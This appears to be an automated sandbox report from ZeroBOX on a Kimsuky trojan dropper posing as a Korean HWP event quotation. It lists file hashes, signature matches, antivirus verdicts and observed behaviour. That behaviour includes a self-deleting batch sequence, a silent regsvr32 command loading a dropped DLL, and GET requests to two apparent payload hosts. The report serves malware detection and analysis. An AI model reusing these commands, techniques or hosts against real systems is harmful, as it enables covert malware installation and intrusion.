Summary | ZeroBOX

베트남 녹지원 상춘재 행사 견적서.hwp .exe

Tags: Generic Malware, Malicious Library, UPX, MSOffice File, PE File, dll, OS Processor Check, PE32, DLL, HWP, DllRegisterServer
Category FILE
Machine s1_win7_x6401
Started Aug. 16, 2024, 6:28 p.m.
Completed Aug. 16, 2024, 6:30 p.m.
Size 468.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 35d60d2723c649c97b414b3cb701df1c
SHA256 6dfce07abc39e5d6aebd74a1850ad65cc6ce10a8540b551c4f6d441ec4cf48ab
CRC32 5C17FF35
ssdeep 3072:Gbd/5pl6sI/8EOoulXCjiaOOsJpAG9BU1cdvjbE:sdrI/XOlVaOO4zUM0
PDB Path E:\pc\makeHwp\Bin\makeHwp.pdb
Yara
  • HWP_file_format - HWP Document File
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • DllRegisterServer_Zero - execute regsvr32.exe
  • Microsoft_Office_File_Zero - Microsoft Office File
  • IsPE32 - (no description)
  • Generic_Malware_Zero - Generic Malware
  • UPX_Zero - UPX packed file
  • OS_Processor_Check_Zero - OS Processor Check

IP Address Status Action
164.124.101.2 Active Moloch
182.162.73.77 Active Moloch

Time & API Arguments Status Return Repeated
IsDebuggerPresent    0 0

Time & API Arguments Status Return Repeated
WriteConsoleW    buffer: C:\Users\test22\AppData\Local\Temp>    console_handle: 0x00000007    1 1 0
WriteConsoleW    buffer: del    console_handle: 0x00000007    1 1 0
WriteConsoleW    buffer: "C:\Users\test22\AppData\Local\Temp\??? ??? ??? ?? ???.hwp .exe"    console_handle: 0x00000007    1 1 0
WriteConsoleW    buffer: C:\Users\test22\AppData\Local\Temp>    console_handle: 0x00000007    1 1 0
WriteConsoleW    buffer: if    console_handle: 0x00000007    1 1 0
WriteConsoleW    buffer: exist "C:\Users\test22\AppData\Local\Temp\??? ??? ??? ?? ???.hwp .exe"    console_handle: 0x00000007    1 1 0
WriteConsoleW    buffer: goto    console_handle: 0x00000007    1 1 0
WriteConsoleW    buffer: Repeat1    console_handle: 0x00000007    1 1 0
WriteConsoleW    buffer: C:\Users\test22\AppData\Local\Temp>    console_handle: 0x00000007    1 1 0
WriteConsoleW    buffer: del    console_handle: 0x00000007    1 1 0
WriteConsoleW    buffer: "C:\Users\test22\AppData\Local\Temp\rns.bat"    console_handle: 0x00000007    1 1 0
WriteConsoleW    buffer: The batch file cannot be found.    console_handle: 0x0000000b    1 1 0
pdb_path E:\pc\makeHwp\Bin\makeHwp.pdb
Time & API Arguments Status Return Repeated
GlobalMemoryStatusEx    1 1 0
resource name BINARY
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
CtfImeIsIME+0x36fd DllUnregisterServer-0xf9d9 msctf+0x2d08c @ 0x75aad08c
TF_GetGlobalCompartment+0x3dfd CtfImeIsIME-0x344 msctf+0x2964b @ 0x75aa964b
TF_GetInputScope+0xf65 CtfImeDestroyThreadMgr-0x25ae msctf+0x14d6b @ 0x75a94d6b
TF_GetInputScope+0x3176 CtfImeDestroyThreadMgr-0x39d msctf+0x16f7c @ 0x75a96f7c
CtfImeDestroyInputContext+0x280 TF_CanUninitialize-0x1c msctf+0x1e825 @ 0x75a9e825
TF_GetInputScope+0x21fc CtfImeDestroyThreadMgr-0x1317 msctf+0x16002 @ 0x75a96002
TF_GetInputScope+0x21e2 CtfImeDestroyThreadMgr-0x1331 msctf+0x15fe8 @ 0x75a95fe8
TF_GetInputScope+0xbdd CtfImeDestroyThreadMgr-0x2936 msctf+0x149e3 @ 0x75a949e3
TF_GetInputScope+0x1c1a CtfImeDestroyThreadMgr-0x18f9 msctf+0x15a20 @ 0x75a95a20
RtlIsCurrentThreadAttachExempt+0x5f TpCheckTerminateWorker-0x37 ntdll+0x39a91 @ 0x76f49a91
LdrShutdownProcess+0x97 RtlDetectHeapLeaks-0x1bb ntdll+0x58f10 @ 0x76f68f10
RtlExitUserProcess+0x74 LdrShutdownProcess-0x1d ntdll+0x58e5c @ 0x76f68e5c
ExitProcess+0x15 TerminateThread-0xa kernel32+0x17a25 @ 0x755c7a25
rundll32+0x135c @ 0x72135c
rundll32+0x1901 @ 0x721901
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: ff 51 0c 8b 45 fc 89 be 8c 04 00 00 3b c7 74 25
exception.symbol: TF_GetCompatibleKeyboardLayout+0x5885 TF_IsCtfmonRunning-0xfd3 msctf+0x43ef4
exception.instruction: call dword ptr [ecx + 0xc]
exception.module: MSCTF.dll
exception.exception_code: 0xc0000005
exception.offset: 278260
exception.address: 0x75ac3ef4
registers.esp: 784480
registers.edi: 0
registers.eax: 44403344
registers.ebp: 784508
registers.edx: 1
registers.ebx: 0
registers.esi: 5557552
registers.ecx: 1931818460
1 0 0
request GET http://antichrist.or.kr/data/cheditor/dir1/lyric64
request GET http://gaja79.com/link/fow-mh1004.html
Time & API Arguments Status Return Repeated
NtProtectVirtualMemory (15 calls; every call has stack_dep_bypass: 0, stack_pivoted: 0, heap_dep_bypass: 0, length: 4096, protection: 64 (PAGE_EXECUTE_READWRITE), process_handle: 0xffffffff)
NtProtectVirtualMemory    process_identifier: 2668    base_address: 0x73bd4000    1 0 0
NtProtectVirtualMemory    process_identifier: 2668    base_address: 0x73951000    1 0 0
NtProtectVirtualMemory    process_identifier: 2668    base_address: 0x75591000    1 0 0
NtProtectVirtualMemory    process_identifier: 2668    base_address: 0x735d1000    1 0 0
NtProtectVirtualMemory    process_identifier: 2716    base_address: 0x73bd4000    1 0 0
NtProtectVirtualMemory    process_identifier: 2716    base_address: 0x73951000    1 0 0
NtProtectVirtualMemory    process_identifier: 2716    base_address: 0x73fb0000    1 0 0
NtProtectVirtualMemory    process_identifier: 2716    base_address: 0x73351000    1 0 0
NtProtectVirtualMemory    process_identifier: 2716    base_address: 0x732c1000    1 0 0
NtProtectVirtualMemory    process_identifier: 2716    base_address: 0x72be4000    1 0 0
NtProtectVirtualMemory    process_identifier: 2716    base_address: 0x73352000    1 0 0
NtProtectVirtualMemory    process_identifier: 2716    base_address: 0x73c11000    1 0 0
NtProtectVirtualMemory    process_identifier: 2716    base_address: 0x75d41000    1 0 0
NtProtectVirtualMemory    process_identifier: 2716    base_address: 0x75e61000    1 0 0
NtProtectVirtualMemory    process_identifier: 2716    base_address: 0x76161000    1 0 0
name BINARY language LANG_KOREAN filetype PE32 executable (DLL) (GUI) Intel 80386, for MS Windows sublanguage SUBLANG_KOREAN offset 0x00056c00 size 0x0001b400
name RT_ICON language LANG_KOREAN filetype GLS_BINARY_LSB_FIRST sublanguage SUBLANG_KOREAN offset 0x00056738 size 0x00000468
name RT_STRING language LANG_KOREAN filetype data sublanguage SUBLANG_KOREAN offset 0x00075800 size 0x0000004c
name RT_GROUP_ICON language LANG_KOREAN filetype data sublanguage SUBLANG_KOREAN offset 0x00056ba0 size 0x0000005a
file C:\Users\test22\AppData\Local\Temp\rns.bat
cmdline regsvr32.exe /s /n /i NewACt.dat
cmdline "C:\Windows\System32\regsvr32.exe" /s /n /i NewACt.dat
file C:\Users\test22\AppData\Local\Temp\rns.bat
file C:\Users\test22\AppData\Roaming\Microsoft\NewACt.dat
Time & API Arguments Status Return Repeated
ShellExecuteExW    show_type: 0    filepath_r: C:\Users\test22\AppData\Local\Temp\rns.bat    parameters:    filepath: C:\Users\test22\AppData\Local\Temp\rns.bat    1 1 0
ShellExecuteExW    show_type: 0    filepath_r: regsvr32.exe    parameters: /s /n /i NewACt.dat    filepath: regsvr32.exe    1 1 0
Lionic Trojan.Win32.RunDll.tr9E
Elastic malicious (high confidence)
Cynet Malicious (score: 100)
Skyhigh BehavesLike.Win32.PUPXAF.gt
ALYac Trojan.Agent.479232K
Cylance unsafe
VIPRE Dropped:Trojan.GenericKD.42082389
Sangfor Trojan.Win32.Kimusky.PA
K7AntiVirus Riskware ( 0040eff71 )
BitDefender Dropped:Trojan.GenericKD.42082389
K7GW Riskware ( 0040eff71 )
Arcabit Trojan.Generic.D2822055
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Win32/Kimsuky.L
McAfee Artemis!35D60D2723C6
Avast Win32:Malware-gen
Kaspersky Trojan.Win32.RunDll.acja
Alibaba Trojan:Win32/RunDll.2a990a0c
NANO-Antivirus Trojan.Win32.RunDll.hcruhh
MicroWorld-eScan Dropped:Trojan.GenericKD.42082389
Rising Trojan.Generic@AI.94 (RDML:K6Ty4w3M9JwFVXLyEX/S5Q)
Emsisoft Dropped:Trojan.GenericKD.42082389 (B)
F-Secure Trojan.TR/Dropper.Gen
DrWeb Trojan.PWS.Siggen2.40052
Zillya Trojan.Agent.Win32.1210553
TrendMicro TROJ_KSDOORLDR.ZJGL-A
FireEye Generic.mg.35d60d2723c649c9
Sophos Mal/Generic-S
Ikarus Trojan.Dropper
Jiangmin Trojan.Rundll.xr
Webroot W32.Gen.BT
Google Detected
Avira TR/Dropper.Gen
MAX malware (ai score=100)
Antiy-AVL Trojan/Win32.Kimsuky
Xcitium Malware@#37fplx3tp6d8
Microsoft Trojan:Win32/Kimusky.PA!MTB
ViRobot Dropper.S.Agent.479232.A
ZoneAlarm Trojan.Win32.RunDll.acja
GData Dropped:Trojan.GenericKD.42082389
Varist W32/ABTrojan.JOPL-1101
AhnLab-V3 Backdoor/Win32.Kimsuky.R302020
BitDefenderTheta Gen:NN.ZexaF.36804.DuW@aOvXtLdO
DeepInstinct MALICIOUS
VBA32 BScope.Trojan.Kimsuky
Malwarebytes Generic.Malware/Suspicious
Panda Trj/CI.A
TrendMicro-HouseCall TROJ_KSDOORLDR.ZJGL-A
Tencent Win32.Trojan.Rundll.Ekjl
Yandex Trojan.RunDll!+lEZb2zXVaM